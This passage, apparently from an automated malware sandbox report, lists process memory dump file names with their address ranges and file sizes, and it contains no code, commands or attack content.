                                                                                                          • memory/5084-294-0x0000000004BF0000-0x0000000004BF1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/5084-289-0x0000000004B70000-0x0000000004B71000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/5112-171-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5140-278-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                            Filesize

                                                                                                            48KB

                                                                                                          • memory/5140-279-0x0000000000402F68-mapping.dmp
                                                                                                          • memory/5196-364-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5208-300-0x0000000000400000-0x0000000000A0C000-memory.dmp
                                                                                                            Filesize

                                                                                                            6.0MB

                                                                                                          • memory/5208-290-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5208-299-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                            Filesize

                                                                                                            36KB

                                                                                                          • memory/5236-252-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5248-253-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5292-363-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5304-285-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5368-369-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5388-350-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5416-257-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5548-356-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5572-258-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5580-354-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5584-361-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5588-263-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/5588-264-0x0000000000790000-0x00000000007A2000-memory.dmp
                                                                                                            Filesize

                                                                                                            72KB

                                                                                                          • memory/5588-259-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5812-269-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5820-367-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5900-362-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5908-270-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5908-284-0x0000000000030000-0x000000000003C000-memory.dmp
                                                                                                            Filesize

                                                                                                            48KB

                                                                                                          • memory/5940-305-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5956-348-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5964-273-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6012-274-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6112-352-0x0000000000000000-mapping.dmp